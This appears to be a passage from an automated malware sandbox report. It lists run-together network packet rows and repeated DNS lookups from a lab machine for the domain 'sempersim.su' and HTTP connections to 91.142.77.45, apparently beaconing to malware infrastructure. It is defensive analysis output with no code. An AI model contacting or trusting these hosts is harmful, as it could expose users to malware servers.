                                      Nov 3, 2022 12:30:57.918358088 CET4972580192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:57.981117010 CET804972591.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:57.981422901 CET4972580192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:58.044042110 CET804972591.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:59.345747948 CET804972591.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:59.345859051 CET4972580192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:59.345896959 CET4972580192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:59.408343077 CET804972591.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:59.590900898 CET4972680192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:59.653625965 CET804972691.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:59.653966904 CET4972680192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:59.657450914 CET4972680192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:59.719468117 CET804972691.142.77.45192.168.2.6
                                      Nov 3, 2022 12:30:59.719604969 CET4972680192.168.2.691.142.77.45
                                      Nov 3, 2022 12:30:59.781557083 CET804972691.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:00.653287888 CET804972691.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:00.655242920 CET4972680192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:00.663146973 CET4972680192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:00.725272894 CET804972691.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:01.617027998 CET4972780192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:01.679668903 CET804972791.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:01.679909945 CET4972780192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:01.987085104 CET4972780192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:02.049709082 CET804972791.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:02.049869061 CET4972780192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:02.112337112 CET804972791.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:03.547635078 CET804972791.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:03.547801971 CET4972780192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:03.566931009 CET4972780192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:03.629586935 CET804972791.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:03.837477922 CET4972880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:03.899904013 CET804972891.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:03.900019884 CET4972880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:03.903902054 CET4972880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:03.965291977 CET804972891.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:03.965487003 CET4972880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:04.027069092 CET804972891.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:05.359035969 CET804972891.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:05.359316111 CET4972880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:05.359364033 CET4972880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:05.421298981 CET804972891.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:05.638746977 CET4972980192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:05.700804949 CET804972991.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:05.703757048 CET4972980192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:05.707381964 CET4972980192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:05.769627094 CET804972991.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:05.770745993 CET4972980192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:05.832711935 CET804972991.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:07.339015961 CET804972991.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:07.339118958 CET4972980192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:07.339199066 CET4972980192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:07.401132107 CET804972991.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:07.560633898 CET4973080192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:07.623106956 CET804973091.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:07.624897957 CET4973080192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:07.626822948 CET4973080192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:07.689232111 CET804973091.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:07.689786911 CET4973080192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:07.752242088 CET804973091.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:09.196542025 CET804973091.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:09.196836948 CET4973080192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:09.196836948 CET4973080192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:09.259278059 CET804973091.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:09.445768118 CET4973180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:09.508224964 CET804973191.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:09.508380890 CET4973180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:09.511790991 CET4973180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:09.574053049 CET804973191.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:09.574201107 CET4973180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:09.636506081 CET804973191.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:10.691873074 CET804973191.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:10.692004919 CET4973180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:10.692087889 CET4973180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:10.754542112 CET804973191.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:11.184847116 CET4973280192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:14.187417030 CET4973280192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:20.203531981 CET4973280192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:20.265314102 CET804973291.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:20.265594006 CET4973280192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:20.467945099 CET4973280192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:20.530160904 CET804973291.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:20.530344963 CET4973280192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:20.592166901 CET804973291.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:21.820409060 CET804973291.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:21.820630074 CET4973280192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:22.154421091 CET4973280192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:22.216218948 CET804973291.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:22.549698114 CET4973380192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:22.612020016 CET804973391.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:22.612163067 CET4973380192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:22.614964008 CET4973380192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:22.906861067 CET4973380192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:22.969685078 CET804973391.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:23.219305992 CET4973380192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:23.281701088 CET804973391.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:25.021801949 CET804973391.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:25.022070885 CET4973380192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:25.022186041 CET4973380192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:25.084297895 CET804973391.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:25.312217951 CET4973480192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:25.374319077 CET804973491.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:25.374602079 CET4973480192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:25.377975941 CET4973480192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:25.439949989 CET804973491.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:25.440109015 CET4973480192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:25.735219002 CET4973480192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:25.797334909 CET804973491.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:27.178864956 CET804973491.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:27.179050922 CET4973480192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:27.179198027 CET4973480192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:27.240988016 CET804973491.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:27.448790073 CET4973580192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:27.512012959 CET804973591.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:27.512259960 CET4973580192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:27.516452074 CET4973580192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:27.578449965 CET804973591.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:27.582582951 CET4973580192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:27.644630909 CET804973591.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:28.883670092 CET804973591.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:28.883851051 CET4973580192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:28.884407997 CET4973580192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:28.946696043 CET804973591.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:29.147102118 CET4973680192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:29.209523916 CET804973691.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:29.209696054 CET4973680192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:29.221112013 CET4973680192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:29.283684969 CET804973691.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:29.283785105 CET4973680192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:29.346216917 CET804973691.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:30.738261938 CET804973691.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:30.741126060 CET4973680192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:30.741179943 CET4973680192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:30.803993940 CET804973691.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:30.980776072 CET4973780192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:31.042650938 CET804973791.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:31.042849064 CET4973780192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:31.046497107 CET4973780192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:31.108190060 CET804973791.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:31.108310938 CET4973780192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:31.170068979 CET804973791.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:32.671320915 CET804973791.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:32.671487093 CET4973780192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:32.671545029 CET4973780192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:32.733457088 CET804973791.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:32.953636885 CET4973880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:33.015853882 CET804973891.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:33.016099930 CET4973880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:33.019427061 CET4973880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:33.329691887 CET4973880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:33.391851902 CET804973891.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:33.642221928 CET4973880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:33.704520941 CET804973891.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:35.287070036 CET804973891.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:35.287317038 CET4973880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:35.287385941 CET4973880192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:35.349495888 CET804973891.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:35.541304111 CET4973980192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:35.603343010 CET804973991.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:35.603456020 CET4973980192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:35.606376886 CET4973980192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:35.668528080 CET804973991.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:35.668613911 CET4973980192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:35.730834961 CET804973991.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:37.318947077 CET804973991.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:37.319128036 CET4973980192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:37.324352026 CET4973980192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:37.386449099 CET804973991.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:37.557636976 CET4974080192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:37.619791985 CET804974091.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:37.619992018 CET4974080192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:37.627027035 CET4974080192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:37.939471960 CET4974080192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:38.001672983 CET804974091.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:38.251959085 CET4974080192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:38.314244986 CET804974091.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:39.620075941 CET804974091.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:39.620259047 CET4974080192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:39.620873928 CET4974080192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:39.685184002 CET804974091.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:39.881978035 CET4974180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:39.943818092 CET804974191.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:39.944036961 CET4974180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:39.946872950 CET4974180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:40.008548021 CET804974191.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:40.008711100 CET4974180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:40.314831972 CET4974180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:40.376741886 CET804974191.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:41.587642908 CET804974191.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:41.587827921 CET4974180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:41.591990948 CET4974180192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:41.653644085 CET804974191.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:41.827121019 CET4974280192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:41.889702082 CET804974291.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:41.889812946 CET4974280192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:41.893270016 CET4974280192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:41.955686092 CET804974291.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:41.955784082 CET4974280192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:42.018265009 CET804974291.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:43.475625992 CET804974291.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:43.475738049 CET4974280192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:43.475821018 CET4974280192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:43.538353920 CET804974291.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:43.715476990 CET4974380192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:43.777441978 CET804974391.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:43.778053999 CET4974380192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:43.782644987 CET4974380192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:43.844577074 CET804974391.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:43.846440077 CET4974380192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:43.908443928 CET804974391.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:45.271881104 CET804974391.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:45.272099972 CET4974380192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:45.272125006 CET4974380192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:45.334127903 CET804974391.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:45.512383938 CET4974480192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:45.574126005 CET804974491.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:45.574229002 CET4974480192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:45.577785969 CET4974480192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:45.639370918 CET804974491.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:45.639533043 CET4974480192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:45.701874018 CET804974491.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:47.249314070 CET804974491.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:47.249638081 CET4974480192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:47.252274036 CET4974480192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:47.313911915 CET804974491.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:47.501317024 CET4974580192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:50.503050089 CET4974580192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:50.565231085 CET804974591.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:50.565506935 CET4974580192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:50.569101095 CET4974580192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:50.631099939 CET804974591.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:50.631377935 CET4974580192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:50.693312883 CET804974591.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:52.163666964 CET804974591.142.77.45192.168.2.6
                                      Nov 3, 2022 12:31:52.164477110 CET4974580192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:52.164544106 CET4974580192.168.2.691.142.77.45
                                      Nov 3, 2022 12:31:52.226689100 CET804974591.142.77.45192.168.2.6
                                      TimestampSource PortDest PortSource IPDest IP
                                      Nov 3, 2022 12:30:06.615612984 CET4978653192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:06.635174990 CET53497868.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:11.893251896 CET5859553192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:11.910538912 CET53585958.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:13.938466072 CET5633153192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:13.958684921 CET53563318.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:15.990658998 CET5050653192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:16.008389950 CET53505068.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:17.960731983 CET4944853192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:18.222553015 CET53494488.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:20.174104929 CET5908253192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:20.193391085 CET53590828.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:22.044584990 CET5950453192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:22.064102888 CET53595048.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:25.312644958 CET6519853192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:25.332699060 CET53651988.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:27.345777988 CET6291053192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:27.365106106 CET53629108.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:30.240421057 CET6386353192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:31.064527988 CET53638638.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:32.906943083 CET6322953192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:32.924936056 CET53632298.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:34.919732094 CET6253853192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:34.938977957 CET53625388.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:36.914690018 CET5490353192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:36.935085058 CET53549038.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:41.510499001 CET5153053192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:41.802865028 CET53515308.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:45.704906940 CET5612253192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:45.724493027 CET53561228.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:47.939956903 CET5255653192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:47.958667994 CET53525568.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:50.734925985 CET6160953192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:50.754672050 CET53616098.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:53.275834084 CET5248153192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:53.293008089 CET53524818.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:54.819243908 CET5394353192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:54.838155985 CET53539438.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:57.832797050 CET5608653192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:57.850481033 CET53560868.8.8.8192.168.2.6
                                      Nov 3, 2022 12:30:59.560048103 CET5654753192.168.2.68.8.8.8
                                      Nov 3, 2022 12:30:59.579384089 CET53565478.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:01.170101881 CET5988153192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:01.189847946 CET53598818.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:03.812359095 CET5891753192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:03.831717968 CET53589178.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:05.602891922 CET5034353192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:05.622453928 CET53503438.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:07.541344881 CET6252053192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:07.558957100 CET53625208.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:09.419343948 CET5562953192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:09.438843966 CET53556298.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:11.161881924 CET5207953192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:11.179299116 CET53520798.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:22.519120932 CET5656953192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:22.538552046 CET53565698.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:25.278309107 CET6183353192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:25.295921087 CET53618338.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:27.427875996 CET6504453192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:27.445188999 CET53650448.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:29.125849009 CET6003253192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:29.145350933 CET53600328.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:30.955920935 CET4923253192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:30.976178885 CET53492328.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:32.930668116 CET5612353192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:32.949887991 CET53561238.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:35.521024942 CET5975253192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:35.540065050 CET53597528.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:37.538077116 CET5286553192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:37.555300951 CET53528658.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:39.862227917 CET5732253192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:39.879426956 CET53573228.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:41.802947998 CET6295853192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:41.821785927 CET53629588.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:43.694916964 CET6440453192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:43.714163065 CET53644048.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:45.492507935 CET6284853192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:45.510040045 CET53628488.8.8.8192.168.2.6
                                      Nov 3, 2022 12:31:47.481296062 CET5595653192.168.2.68.8.8.8
                                      Nov 3, 2022 12:31:47.499958038 CET53559568.8.8.8192.168.2.6
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Nov 3, 2022 12:30:06.615612984 CET192.168.2.68.8.8.80x9698Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:11.893251896 CET192.168.2.68.8.8.80x836Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:13.938466072 CET192.168.2.68.8.8.80x6c7fStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:15.990658998 CET192.168.2.68.8.8.80x898bStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:17.960731983 CET192.168.2.68.8.8.80xfd9Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:20.174104929 CET192.168.2.68.8.8.80xb2c5Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:22.044584990 CET192.168.2.68.8.8.80x3dfStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:25.312644958 CET192.168.2.68.8.8.80x1b5bStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:27.345777988 CET192.168.2.68.8.8.80x744cStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:30.240421057 CET192.168.2.68.8.8.80x679bStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:32.906943083 CET192.168.2.68.8.8.80x93fcStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:34.919732094 CET192.168.2.68.8.8.80xf5b2Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:36.914690018 CET192.168.2.68.8.8.80x4e0bStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:41.510499001 CET192.168.2.68.8.8.80x72fStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:45.704906940 CET192.168.2.68.8.8.80x2cbbStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:47.939956903 CET192.168.2.68.8.8.80x5480Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:50.734925985 CET192.168.2.68.8.8.80xeac7Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:53.275834084 CET192.168.2.68.8.8.80xa703Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:54.819243908 CET192.168.2.68.8.8.80xb2a0Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:57.832797050 CET192.168.2.68.8.8.80x101aStandard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:30:59.560048103 CET192.168.2.68.8.8.80x26c2Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:01.170101881 CET192.168.2.68.8.8.80x2de9Standard query (0)sempersim.suA (IP address)IN (0x0001)false
                                      Nov 3, 2022 12:31:03.812359095 CET192.168.2.68.8.8.80x997dStandard query (0)sempersim.suA (IP address)IN (0x0001)false
